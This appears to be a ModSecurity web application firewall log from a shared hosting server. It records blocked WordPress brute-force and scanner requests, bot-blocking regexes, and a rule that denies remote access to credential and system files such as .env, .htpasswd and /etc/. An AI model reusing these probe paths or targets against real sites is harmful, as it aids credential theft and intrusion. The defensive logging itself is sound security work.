[Tue May 26 15:51:01.572885 2026] [security2:error] [pid 745492:tid 745625] [client 20.104.227.76:33384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahV0DYmEQglTmoWcfxKAoAAAAIU"]
[Tue May 26 15:51:01.583598 2026] [security2:error] [pid 747840:tid 748018] [client 223.123.35.44:36238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0DYm6MwAuYuZKxvn0OgAAATo"]
[Tue May 26 15:51:01.583851 2026] [security2:error] [pid 747840:tid 748018] [client 223.123.35.44:36238] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0DYm6MwAuYuZKxvn0OgAAATo"]
[Tue May 26 15:51:03.212720 2026] [security2:error] [pid 747840:tid 748097] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Dom6MwAuYuZKxvn0RwAAAYk"]
[Tue May 26 15:51:03.908339 2026] [security2:error] [pid 747840:tid 748010] [client 20.104.227.76:17240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.toplaptopguides.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV0D4m6MwAuYuZKxvn0TgAAATI"]
[Tue May 26 15:51:04.789113 2026] [security2:error] [pid 747840:tid 748001] [client 34.136.232.32:59379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.232.136.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/xmlrpc.php"] [unique_id "ahV0EIm6MwAuYuZKxvn0WQAAASk"]
[Tue May 26 15:51:04.990709 2026] [security2:error] [pid 745492:tid 745729] [client 34.136.232.32:56860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EImEQglTmoWcfxKA0QAAAO0"]
[Tue May 26 15:51:05.161876 2026] [security2:error] [pid 747840:tid 747996] [client 34.136.232.32:54261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EYm6MwAuYuZKxvn0egAAASQ"]
[Tue May 26 15:51:05.183797 2026] [security2:error] [pid 747840:tid 748052] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0EIm6MwAuYuZKxvn0ZQAAAVw"]
[Tue May 26 15:51:05.311579 2026] [security2:error] [pid 747840:tid 748000] [client 103.44.52.196:54314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0EYm6MwAuYuZKxvn0hQAAASg"]
[Tue May 26 15:51:05.311714 2026] [security2:error] [pid 747840:tid 748000] [client 103.44.52.196:54314] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0EYm6MwAuYuZKxvn0hQAAASg"]
[Tue May 26 15:51:05.355177 2026] [security2:error] [pid 745492:tid 745719] [client 34.136.232.32:61198] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EYmEQglTmoWcfxKA2AAAAOM"]
[Tue May 26 15:51:05.444953 2026] [security2:error] [pid 747840:tid 748019] [client 20.221.71.226:38564] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "207.174.214.47"] [uri "/cgi-sys/404.html"] [unique_id "ahV0EYm6MwAuYuZKxvn0hwAAATs"]
[Tue May 26 15:51:05.644551 2026] [security2:error] [pid 747840:tid 748060] [client 34.136.232.32:64662] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EYm6MwAuYuZKxvn0iQAAAWQ"]
[Tue May 26 15:51:05.905571 2026] [security2:error] [pid 745492:tid 745733] [client 34.136.232.32:61030] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EYmEQglTmoWcfxKA3gAAAPE"]
[Tue May 26 15:51:06.130960 2026] [security2:error] [pid 745492:tid 745630] [client 34.136.232.32:50543] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EomEQglTmoWcfxKA5QAAAIo"]
[Tue May 26 15:51:06.396939 2026] [security2:error] [pid 745492:tid 745688] [client 34.136.232.32:51374] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EomEQglTmoWcfxKA6QAAAMQ"]
[Tue May 26 15:51:06.602696 2026] [security2:error] [pid 745492:tid 745672] [client 34.136.232.32:52800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EomEQglTmoWcfxKA7QAAALQ"]
[Tue May 26 15:51:06.738797 2026] [security2:error] [pid 745492:tid 745728] [client 114.119.139.1:28379] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV0EomEQglTmoWcfxKA8QAAAOw"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_25_106
[Tue May 26 15:51:06.875220 2026] [security2:error] [pid 745492:tid 745648] [client 34.136.232.32:51078] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV0EomEQglTmoWcfxKA8wAAAJw"]
[Tue May 26 15:51:07.034114 2026] [security2:error] [pid 745492:tid 745727] [client 103.153.130.62:53181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0E4mEQglTmoWcfxKA-QAAAOs"]
[Tue May 26 15:51:07.034234 2026] [security2:error] [pid 745492:tid 745727] [client 103.153.130.62:53181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0E4mEQglTmoWcfxKA-QAAAOs"]
[Tue May 26 15:51:07.099045 2026] [security2:error] [pid 745492:tid 745683] [client 34.136.232.32:62891] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV0E4mEQglTmoWcfxKA-gAAAL8"]
[Tue May 26 15:51:07.315075 2026] [security2:error] [pid 745492:tid 745715] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0EomEQglTmoWcfxKA9AAAAN8"]
[Tue May 26 15:51:07.326540 2026] [security2:error] [pid 745492:tid 745677] [client 34.136.232.32:53800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV0E4mEQglTmoWcfxKBAQAAALk"]
[Tue May 26 15:51:07.597660 2026] [security2:error] [pid 745492:tid 745722] [client 85.208.96.198:65196] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV0E4mEQglTmoWcfxKBBQAAAOY"]
[Tue May 26 15:51:07.597784 2026] [security2:error] [pid 745492:tid 745722] [client 85.208.96.198:65196] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV0E4mEQglTmoWcfxKBBQAAAOY"]
[Tue May 26 15:51:09.357128 2026] [security2:error] [pid 747840:tid 747988] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0FIm6MwAuYuZKxvn0qAAAARw"]
[Tue May 26 15:51:10.460031 2026] [security2:error] [pid 747840:tid 747905] [remote 178.156.182.155:34150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV0Fom6MwAuYuZKxvn0uQABIEA"]
[Tue May 26 15:51:11.456360 2026] [security2:error] [pid 745492:tid 745664] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0F4mEQglTmoWcfxKBPwAAAKw"]
[Tue May 26 15:51:13.597078 2026] [security2:error] [pid 745492:tid 745725] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0GYmEQglTmoWcfxKBVAAAAOk"]
[Tue May 26 15:51:14.082954 2026] [security2:error] [pid 747840:tid 748089] [client 143.110.243.118:57694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/small.php"] [unique_id "ahV0Gom6MwAuYuZKxvn05AAAAYE"]
[Tue May 26 15:51:15.596188 2026] [security2:error] [pid 747840:tid 747992] [client 103.44.52.196:46102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0G4m6MwAuYuZKxvn1CwAAASA"]
[Tue May 26 15:51:15.596307 2026] [security2:error] [pid 747840:tid 747992] [client 103.44.52.196:46102] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0G4m6MwAuYuZKxvn1CwAAASA"]
[Tue May 26 15:51:15.712050 2026] [security2:error] [pid 747840:tid 748043] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0G4m6MwAuYuZKxvn1BAAAAVM"]
[Tue May 26 15:51:17.427967 2026] [security2:error] [pid 747840:tid 748066] [client 103.153.130.62:53470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0HYm6MwAuYuZKxvn1LQAAAWo"]
[Tue May 26 15:51:17.428119 2026] [security2:error] [pid 747840:tid 748066] [client 103.153.130.62:53470] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0HYm6MwAuYuZKxvn1LQAAAWo"]
[Tue May 26 15:51:17.982779 2026] [security2:error] [pid 747840:tid 748071] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0HYm6MwAuYuZKxvn1MwAAAW8"]
[Tue May 26 15:51:19.851220 2026] [security2:error] [pid 747840:tid 748075] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0H4m6MwAuYuZKxvn1TgAAAXM"]
[Tue May 26 15:51:20.186657 2026] [core:crit] [pid 747840:tid 748083] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:51:21.157356 2026] [security2:error] [pid 745492:tid 745554] [remote 74.7.241.58:42754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV0IYmEQglTmoWcfxKBlQAA2zo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/includes
[Tue May 26 15:51:21.572911 2026] [security2:error] [pid 747840:tid 747984] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0IYm6MwAuYuZKxvn1ZQAAARg"]
[Tue May 26 15:51:22.180821 2026] [security2:error] [pid 745492:tid 745708] [client 114.119.136.245:41925] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/wooden-art/"] [unique_id "ahV0IomEQglTmoWcfxKBoQAAANg"], referer: https://poonawallatennisacademy.com/wooden-art/
[Tue May 26 15:51:23.787996 2026] [autoindex:error] [pid 747840:tid 747938] [remote 40.160.16.154:15814] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:51:23.874385 2026] [security2:error] [pid 747840:tid 748025] [client 176.65.139.231:26660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.omshriinfra.omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahV0I4m6MwAuYuZKxvn1jgAAAUE"]
[Tue May 26 15:51:23.882411 2026] [security2:error] [pid 747840:tid 748012] [client 176.65.139.235:35386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahV0I4m6MwAuYuZKxvn1jwAAATQ"]
[Tue May 26 15:51:24.176822 2026] [security2:error] [pid 745492:tid 745648] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0I4mEQglTmoWcfxKBtwAAAJw"]
[Tue May 26 15:51:24.907934 2026] [security2:error] [pid 747840:tid 748082] [client 202.76.169.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0JIm6MwAuYuZKxvn1nQAAAXo"]
[Tue May 26 15:51:24.951110 2026] [core:crit] [pid 745492:tid 745736] (13)Permission denied: [client 40.77.167.11:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:51:25.663763 2026] [security2:error] [pid 747840:tid 748059] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0JYm6MwAuYuZKxvn1pwAAAWM"]
[Tue May 26 15:51:26.196847 2026] [security2:error] [pid 747840:tid 748086] [client 103.44.52.196:48632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Jom6MwAuYuZKxvn1tAAAAX4"]
[Tue May 26 15:51:26.197027 2026] [security2:error] [pid 747840:tid 748086] [client 103.44.52.196:48632] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Jom6MwAuYuZKxvn1tAAAAX4"]
[Tue May 26 15:51:27.175988 2026] [security2:error] [pid 747840:tid 747972] [client 74.7.175.190:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV0J4m6MwAuYuZKxvn1xwAAAQw"]
[Tue May 26 15:51:27.207769 2026] [security2:error] [pid 745492:tid 745724] [client 74.7.175.190:53978] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahV0J4mEQglTmoWcfxKB3wAA6Dw"]
[Tue May 26 15:51:27.596438 2026] [autoindex:error] [pid 747840:tid 748033] [client 74.7.241.62:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:51:28.042048 2026] [security2:error] [pid 745492:tid 745688] [client 103.153.130.62:53754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0J4mEQglTmoWcfxKB7AAAAMQ"]
[Tue May 26 15:51:28.042168 2026] [security2:error] [pid 745492:tid 745688] [client 103.153.130.62:53754] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0J4mEQglTmoWcfxKB7AAAAMQ"]
[Tue May 26 15:51:28.356299 2026] [security2:error] [pid 747840:tid 748057] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0J4m6MwAuYuZKxvn12wAAAWE"]
[Tue May 26 15:51:30.324970 2026] [security2:error] [pid 747840:tid 748020] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0KYm6MwAuYuZKxvn2AwAAATw"]
[Tue May 26 15:51:31.470100 2026] [security2:error] [pid 747840:tid 747977] [client 74.7.241.164:49074] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "kineticinfraprojects.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV0K4m6MwAuYuZKxvn2JgABEW8"]
[Tue May 26 15:51:32.156902 2026] [security2:error] [pid 747840:tid 748080] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0K4m6MwAuYuZKxvn2KQAAAXg"]
